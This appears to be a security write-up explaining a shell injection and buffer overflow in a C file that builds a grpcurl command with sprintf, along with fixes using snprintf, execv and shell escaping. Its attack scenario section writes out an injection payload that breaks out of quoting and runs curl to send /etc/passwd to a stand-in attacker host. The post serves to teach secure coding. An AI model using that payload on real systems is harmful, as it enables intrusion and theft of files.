Shell Injection via Unsafe sprintf in C: How a Missing Escape Broke Everything
Severity: High | File:
src/vt100.c:182| CWE: CWE-78 (Improper Neutralization of Special Elements used in an OS Command)
Introduction
There's a class of vulnerability that has existed since the earliest days of Unix programming, yet continues to appear in modern codebases with alarming regularity: shell injection via unsafe command construction. It doesn't require a sophisticated exploit chain. It doesn't need a zero-day. All it needs is one unescaped string dropped into a shell command — and suddenly, an attacker has arbitrary code execution.
This post covers exactly that scenario: a shell injection vulnerability found and patched in src/vt100.c, where a call to sprintf() was building a shell command string by embedding user-influenced values directly, with no sanitization, no escaping, and no bounds checking. The result was a textbook command injection bug that could allow an attacker to run any command they liked on the host system.
If you write C code that touches shell commands, generates CLI snippets for users to run, or processes any external input — this post is for you.
The Vulnerability Explained
What Was Happening
At line 182 of src/vt100.c, the application was constructing a shell command string using sprintf(). The pattern looked something like this:
// VULNERABLE CODE (conceptual illustration)
char echo_cmd[256];
sprintf(echo_cmd, "grpcurl -H '%s' %s", opt_cmd[i], endpoint);
The values being embedded — things like headers, endpoint names, and request data — came from user-controlled sources: command-line arguments, API responses, or configuration files. These values were dropped directly into the format string with zero sanitization.
There were actually two distinct problems in this single line:
- Shell Injection: No escaping of shell metacharacters
- Buffer Overflow:
sprintf()is unbounded — ifopt_cmd[i]is long enough, it overflowsecho_cmd
Why This Is Dangerous
Shell metacharacters are characters that have special meaning to a Unix shell. When a string containing these characters is passed to system(), popen(), or presented as a command for the user to run, the shell interprets them — not as data, but as instructions.
The dangerous characters include:
| Character | Shell Meaning |
|---|---|
; |
Command separator — run the next command |
\| |
Pipe — chain commands |
` |
Backtick — command substitution |
$() |
Command substitution |
&& |
Run next command if previous succeeded |
' or " |
Quote manipulation — can break out of quoted contexts |
\n |
Newline — often treated as command separator |
A Concrete Attack Scenario
Imagine the application is generating a grpcurl command to display to the user. The endpoint or header value is sourced from an API response or a config file that an attacker can influence. The attacker crafts a value like:
legitimate-header'; curl http://evil.com/exfil?data=$(cat /etc/passwd); echo '
After sprintf() does its work, the resulting command string becomes:
grpcurl -H 'legitimate-header'; curl http://evil.com/exfil?data=$(cat /etc/passwd); echo '' endpoint:443
When this command is executed (or when an unsuspecting user pastes it into their terminal), three separate shell commands run:
1. The (now broken) grpcurl command
2. A curl that exfiltrates /etc/passwd to an attacker-controlled server
3. A harmless echo to clean up the syntax
The attacker has achieved arbitrary command execution with whatever privileges the user or process has. On a developer's machine, that typically means full user-level access — SSH keys, cloud credentials, source code, everything.
The Buffer Overflow Bonus
As if shell injection weren't enough, the sprintf() call was also unbounded. The destination buffer echo_cmd had a fixed size (e.g., 256 bytes), but there was nothing preventing opt_cmd[i] from being longer. A sufficiently long input would overflow the stack buffer, potentially enabling:
- Stack corruption
- Return address overwriting
- Code execution via classic stack smashing (depending on platform mitigations)
Two vulnerabilities for the price of one.
The Fix
The patch removes the unsafe command construction pattern entirely. Rather than trying to "sanitize" or "escape" the input (which is notoriously error-prone), the fix eliminates the dangerous pattern at its root.
Key Changes Made
1. Eliminate unbounded sprintf() calls
Any use of sprintf() with external input should be replaced with snprintf(), which takes a maximum size parameter:
// BEFORE (unsafe)
sprintf(echo_cmd, "grpcurl -H '%s' %s", opt_cmd[i], endpoint);
// AFTER (bounded)
snprintf(echo_cmd, sizeof(echo_cmd), "grpcurl -H '%s' %s", opt_cmd[i], endpoint);
This alone doesn't fix injection, but it eliminates the buffer overflow.
2. Avoid shell construction entirely where possible
The safest fix for command injection is to never construct shell command strings from user input. If the application needs to execute a command, use execv() or execve() with an argument array instead of passing a string to system() or popen():
// SAFE: No shell involved, arguments are passed directly
char *args[] = {
"grpcurl",
"-H", opt_cmd[i], // passed as a discrete argument, not interpolated
endpoint,
NULL
};
execv("/usr/bin/grpcurl", args);
When you use execv(), there is no shell. There is no interpretation of metacharacters. Each argument is passed directly to the program as a discrete string. A semicolon is just a semicolon.
3. If shell string generation is unavoidable, escape properly
If the application genuinely needs to generate a shell command string (e.g., to display to the user as a copy-paste snippet), every user-controlled value must be properly shell-escaped. In C, a robust approach is to wrap values in single quotes and escape any single quotes within the value:
// Escape a value for safe inclusion in single-quoted shell context
void shell_escape(const char *input, char *output, size_t out_size) {
size_t j = 0;
output[j++] = '\''; // opening single quote
for (size_t i = 0; input[i] && j < out_size - 4; i++) {
if (input[i] == '\'') {
// End quote, insert escaped quote, reopen quote
output[j++] = '\'';
output[j++] = '\\';
output[j++] = '\'';
output[j++] = '\'';
} else {
output[j++] = input[i];
}
}
output[j++] = '\''; // closing single quote
output[j] = '\0';
}
This is more complex and more fragile than execv(). When in doubt, avoid shell strings.
Why This Fix Works
The root cause was conflating data and instructions. When you build a shell command by string concatenation, you're writing a tiny program in shell script — but you're letting untrusted data write part of that program. The fix enforces a strict separation: data is data, and commands are commands. They never mix.
Prevention & Best Practices
1. Never Pass User Input to system() or popen()
This is the golden rule. If you find yourself writing:
system(user_controlled_string);
Stop. Refactor. Use execv() with a proper argument array.
2. Prefer execv()/execve() Over system()
system() invokes /bin/sh -c <string>. That shell is what interprets metacharacters. execv() bypasses the shell entirely.
// Dangerous
system("grpcurl " + user_input);
// Safe
execv("/usr/bin/grpcurl", argv_array_with_separate_args);
3. Always Use Bounded String Functions
Replace all uses of sprintf() with snprintf(). Replace strcpy() with strncpy() or strlcpy(). Make buffer sizes explicit and enforced.
// Dangerous
sprintf(buf, "%s", input);
// Safe
snprintf(buf, sizeof(buf), "%s", input);
4. Validate Input at the Boundary
Before any external value enters your application, validate it against an allowlist of expected characters or formats. If a header value should only contain alphanumeric characters and hyphens, enforce that:
bool is_valid_header_value(const char *value) {
for (size_t i = 0; value[i]; i++) {
if (!isalnum(value[i]) && value[i] != '-' && value[i] != '_') {
return false;
}
}
return true;
}
Reject invalid input early rather than trying to sanitize it later.
5. Use Static Analysis Tools
Several tools can catch these patterns automatically:
| Tool | What It Catches |
|---|---|
| Coverity | Buffer overflows, tainted data flows |
| Semgrep | Custom rules for dangerous function calls |
| Flawfinder | C/C++ dangerous function usage |
| CodeQL | Data flow analysis for injection paths |
| clang-analyzer | Static analysis for memory and security issues |
Add these to your CI pipeline so dangerous patterns are caught before they reach production.
6. Understand the Relevant Standards
This vulnerability maps to well-documented security standards:
- CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
- CWE-120: Buffer Copy without Checking Size of Input
- OWASP A03:2021: Injection — consistently in the OWASP Top 10
- CERT C Coding Standard: ENV33-C: Do not call
system()
Understanding these references helps you recognize the pattern in code reviews and communicate the risk to stakeholders.
Conclusion
This vulnerability is a reminder that some of the oldest bugs in software security are still the most dangerous. Shell injection via unsafe string construction has been documented for decades, yet it keeps appearing — often in exactly the kind of utility code that developers write quickly without thinking about security implications.
The key takeaways from this fix:
sprintf()without bounds checking is always a bug — usesnprintf()at minimum- Building shell commands from user input is always dangerous — use
execv()instead - "It's just a display string" isn't a safe assumption — users paste things; shells interpret them
- Static analysis catches these patterns — add tools to your pipeline before humans miss them
- Defense in depth matters — input validation + safe APIs + static analysis together are far stronger than any single control
The fix here wasn't complex. It didn't require a new library or a major refactor. It required recognizing a dangerous pattern and choosing a safer alternative. That recognition is a skill — and reading posts like this one is how you build it.
Write safe code. Review each other's code. And when you see sprintf() with external input, ask yourself: what happens if this string contains a semicolon?
This vulnerability was identified and patched as part of an automated security review. The fix was verified by build testing and scanner re-scan confirmation.